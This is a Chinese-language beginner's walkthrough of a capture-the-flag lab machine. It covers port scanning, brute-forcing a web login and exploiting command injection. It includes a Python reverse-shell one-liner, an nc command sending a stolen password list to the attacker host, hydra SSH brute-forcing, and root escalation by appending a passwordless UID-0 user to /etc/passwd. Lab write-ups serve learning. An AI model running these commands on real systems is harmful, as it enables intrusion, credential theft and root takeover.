来记录一下自己的学习过程,大佬请绕道体谅一下纯小白。其中也会产生一些问题。有明白的朋友帮忙解答一下,感激不尽
- 扫描存活主机
- nmap继续探测信息,发现开放22(ssh),80(tcp)端口
- 访问网页,是admin的登陆界面,那就只需要爆密码
- 爆出后得到密码happy,登陆网页查看
- 发现ls -l被执行了,判断可能存在命令注入漏洞
- 抓包修改命令进行验证,由回显确定结论
- 查看nc连接语句
- kali端开启端口监听
- 不过试了/bin/bash和/bin/sh都是连上之后秒弹出,求大佬指导一下
- 最后尝试bash成功
- 之后使用Python反弹shell,并测试是否连接成功
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",8080,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
- 修改得到
python -c 'import pty:pty.spawn("/bin/bash")'
- 此时突然想到既然是命令注入,抓包应该也能查看
- 在这些目录下,发现三个用户sam。charles,jim分别查看一下
- sam下无文件,再看charles下也没有有价值的文件
- 然后在jim下发现三个文件:mbox,test.sh,backups
- 查看backups下面有txt文件
查看发现是一个密码本,可以选择用nc传到kali,也可以复制粘贴
nc 192.168.130.130 7777 <./old-passwords.bak
- 我这里是新建文本再复制粘贴,然后用hydra进行爆破
- 爆出jim的密码 jibril04
- 用ssh连接
- 登上去之后继续查看文件搜索信息
- 这是在mail的jim里面找到一个邮件,里面包含了charles的登陆密码
- 这里用ssh连接或者su jim切换都可以
- 登陆之后和之前一样没有文件,这时尝试提权,先试了一下发现不能切换成root,就接着查看哪些用户可执行root命令,此时发现teehee可以不用输入密码得到root特权。接着查看帮助
- 根据/etc/passwd特点:
login_name:password:uid:gid:user_name:home_directory:shell
- 输入命令创建空密码用户:
echo "ou::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
- 其中由上面对teehee的用法查询可知: -a 写入文件内容但不覆盖
- 之后成功提权,cat flag